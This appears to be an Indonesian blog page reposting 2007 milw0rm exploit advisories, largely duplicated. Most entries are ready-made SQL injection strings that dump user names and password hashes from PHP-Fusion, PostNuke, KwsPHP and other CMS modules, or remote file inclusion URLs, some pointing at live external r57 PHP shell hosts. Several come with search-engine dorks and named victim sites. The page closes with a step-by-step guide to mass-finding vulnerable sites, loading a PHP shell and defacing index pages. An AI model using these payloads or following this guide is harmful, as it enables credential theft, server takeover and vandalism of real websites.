======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================
# milw0rm.com [2007-03-16]
Sabtu, 20 Oktober 2007
PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit
Ringkasan ini tidak tersedia. Harap
klik di sini untuk melihat postingan.
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron
xoron.biz
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron
xoron.biz
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
Bulan: xoron
xoron.biz
+
Love's the funeral of hearts
The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you
:(
============================================================
Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
============================================================
Example: http://andersonvision.com/PostNuke/
============================================================
# milw0rm.com [2007-04-28]
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
Bulan: xoron
xoron.biz
+
Love's the funeral of hearts
The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you
:(
============================================================
Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
============================================================
Example: http://andersonvision.com/PostNuke/
============================================================
# milw0rm.com [2007-04-28]
IntegralMOD
------------------------
Found: xoron
------------------------
Vendor: http://www.integramod.nl/forum/portal.php
Download: http://sourceforge.net/project/showfiles.php?group_id=191355
------------------------
Exploit:
includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
------------------------
Kral kraldır!
------------------------
# milw0rm.com [2007-09-27]
Found: xoron
------------------------
Vendor: http://www.integramod.nl/forum/portal.php
Download: http://sourceforge.net/project/showfiles.php?group_id=191355
------------------------
Exploit:
includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
------------------------
Kral kraldır!
------------------------
# milw0rm.com [2007-09-27]
phpBB Openid 0.2.0 Remote File Include
============================================
= =
= XORON (c) 2007 =
= =
============================================
= =
= phpBB Openid 0.2.0 Remote File Include =
= =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
= =
= Special thanks "k1tkat" :) =
= =
============================================
# milw0rm.com [2007-09-30]
= =
= XORON (c) 2007 =
= =
============================================
= =
= phpBB Openid 0.2.0 Remote File Include =
= =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
= =
= Special thanks "k1tkat" :) =
= =
============================================
# milw0rm.com [2007-09-30]
Joomla com_wmtgallery Remote File Include
============================================
= =
= XORON (c) 2007 =
= =
============================================
= =
=Joomla com_wmtgallery Remote File Include
= =
============================================
=
= Download:
=
= http://www.webmaster-tips.net
=
============================================
=
= Exploit:
= /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=shell?
=
============================================
= =
=Tum islam aleminin ramazan bayrami mubarek olsn =
= =
============================================
# milw0rm.com [2007-10-07]
= =
= XORON (c) 2007 =
= =
============================================
= =
=Joomla com_wmtgallery Remote File Include
= =
============================================
=
= Download:
=
= http://www.webmaster-tips.net
=
============================================
=
= Exploit:
= /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=shell?
=
============================================
= =
=Tum islam aleminin ramazan bayrami mubarek olsn =
= =
============================================
# milw0rm.com [2007-10-07]
Joomla com_colorlab Remote File Include
--------------------
Joomla com_colorlab Remote File Include
--------------------
Found : xoron
--------------------
Download:
http://download.joomlaportal.ch/content/view/474/
--------------------
Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );
--------------------
Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?
--------------------
How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
3-save and exit
--------------------
Thanx: mdx :)
--------------------
# milw0rm.com [2007-10-12]
Joomla com_colorlab Remote File Include
--------------------
Found : xoron
--------------------
Download:
http://download.joomlaportal.ch/content/view/474/
--------------------
Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );
--------------------
Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?
--------------------
How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
3-save and exit
--------------------
Thanx: mdx :)
--------------------
# milw0rm.com [2007-10-12]
KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit
--------------------
KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit
--------------------
Found : xoron
--------------------
Exploit:
Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*
Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*
--------------------
Bundan sonra hep tek, hep yek xoron..!
--------------------
# milw0rm.com [2007-10-13]
KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit
--------------------
Found : xoron
--------------------
Exploit:
Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*
Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*
--------------------
Bundan sonra hep tek, hep yek xoron..!
--------------------
# milw0rm.com [2007-10-13]
WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include
|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Authord : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64, |
| exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX; |
| |
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------
# milw0rm.com [2007-03-15]
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Authord : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64, |
| exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX; |
| |
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------
# milw0rm.com [2007-03-15]
ClassWeb <= 2.03 Remote File Include Vulnerabilities
# ClassWeb <= 2.03 Remote File Include Vulnerabilities
# D.Script: http://sourceforge.net/projects/classweb/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:
# [path]/classweb/language.php?BASE=Shell
# [Path]/classweb/phpadmin/survey.php?BASE=Shell
# milw0rm.com [2007-03-22]
# D.Script: http://sourceforge.net/projects/classweb/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:
# [path]/classweb/language.php?BASE=Shell
# [Path]/classweb/phpadmin/survey.php?BASE=Shell
# milw0rm.com [2007-03-22]
Webavis Remote file inclusion (root)
#Webavis Remote file inclusion (root)
#Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz
#Thanks Str0ke :D
#Exploit :
#http://victim.com/webavis/class/class.php?root=shell.txt ?
#Discovered by ThE TiGeR
#Miro_Tiger[at]Hotmail.com
# milw0rm.com [2007-05-25
#Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz
#Thanks Str0ke :D
#Exploit :
#http://victim.com/webavis/class/class.php?root=shell.txt ?
#Discovered by ThE TiGeR
#Miro_Tiger[at]Hotmail.com
# milw0rm.com [2007-05-25
Dagger-web engine(cal.func.php)Remote File Inclusion
###Dagger-web engine(cal.func.php)Remote File Inclusion###
#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.
zip
#found by: katatafish (karatatata@hush.com)
#code: (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');
#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]
#Thanks: str0ke
# milw0rm.com [2007-06-24]
#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.
zip
#found by: katatafish (karatatata@hush.com)
#code: (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');
#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]
#Thanks: str0ke
# milw0rm.com [2007-06-24]
EVA-Web 1.1
###############################################################################################
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
###############################################################################################
#Program Title ################################################################################
#EVA-Web 1.1<=2.2 Remote File Inclusion
#
#Note #######################################################################################
#A patch was released some time ago..but there was never an exploit released..
#
#Script Download ##############################################################################
#http://spip-edu.edres74.net
#
#d0rk ######################################################################################
#"et utilise le squelette EVA-Web" -3.0 -2.3
#
#Spl0it #########################################################################################
#www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt?
#www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt?
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#, Bernard, and everyone else at g00ns.net
###############################################################################################
# milw0rm.com [2007-06-26]
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
###############################################################################################
#Program Title ################################################################################
#EVA-Web 1.1<=2.2 Remote File Inclusion
#
#Note #######################################################################################
#A patch was released some time ago..but there was never an exploit released..
#
#Script Download ##############################################################################
#http://spip-edu.edres74.net
#
#d0rk ######################################################################################
#"et utilise le squelette EVA-Web" -3.0 -2.3
#
#Spl0it #########################################################################################
#www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt?
#www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt?
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#
###############################################################################################
# milw0rm.com [2007-06-26]
IBM Rational ClearQuest Web Login Bypass (SQL Injection)
+==============================================================+
+ IBM Rational ClearQuest Web Login Bypass (SQL Injection) +
+==============================================================+
DISCOVERED BY:
==============
SecureState
sasquatch - swhite@securestate.com
rel1k - dkennedy@securestate.com
HOMEPAGE:
=========
www.securestate.com
AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to SQL injection...
SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE
Log in as "admin":
==================
' OR login_name LIKE '%admin%'--
(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...
Confirmed against:
==================
version 7.0.0.1 Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630
FULL SQL Statement is spit back in error message:
=================================================
SELECT
master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
master_users
WHERE
login_name = 'INJECTION GOES HERE
# milw0rm.com [2007-08-14]
+ IBM Rational ClearQuest Web Login Bypass (SQL Injection) +
+==============================================================+
DISCOVERED BY:
==============
SecureState
sasquatch - swhite@securestate.com
rel1k - dkennedy@securestate.com
HOMEPAGE:
=========
www.securestate.com
AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to SQL injection...
SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE
Log in as "admin":
==================
' OR login_name LIKE '%admin%'--
(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...
Confirmed against:
==================
version 7.0.0.1 Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630
FULL SQL Statement is spit back in error message:
=================================================
SELECT
master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
master_users
WHERE
login_name = 'INJECTION GOES HERE
# milw0rm.com [2007-08-14]
webED 0.8999
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Multiple Remote File Inclusion Vulnerability
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz
# Exploit:
# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]
---------------------------------------------------------------
# milw0rm.com [2007-09-08]
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Multiple Remote File Inclusion Vulnerability
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz
# Exploit:
# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]
---------------------------------------------------------------
# milw0rm.com [2007-09-08]
WebDesktop 0.1
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : WebDesktop 0.1
Download : http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : :(
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
include($wsk . ".wsk/" . $wsk . ".php");
&&&&&&&&
include($app . ".app/" . $frm . ".frm/" . $frm . ".php");
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-11]
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : WebDesktop 0.1
Download : http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : :(
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
include($wsk . ".wsk/" . $wsk . ".php");
&&&&&&&&
include($app . ".app/" . $frm . ".frm/" . $frm . ".php");
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-11]
cara menggunakan exploit di site http://milw0rm.com
1. Buka www.milw0rm.com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
13. Ganti command exploit setelah tanda '='[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <-- untuk file | drwxrwxrwx / drw-rw-rw <-- untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama manadocoding dikibarkan disana...hehe maklum itu forum saya!!!
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi
Original post by ping_win (kta lg males ngetik)
Semoga membantu,
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
13. Ganti command exploit setelah tanda '='[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <-- untuk file | drwxrwxrwx / drw-rw-rw <-- untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama manadocoding dikibarkan disana...hehe maklum itu forum saya!!!
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi
Original post by ping_win (kta lg males ngetik)
Semoga membantu,
Langganan:
Postingan (Atom)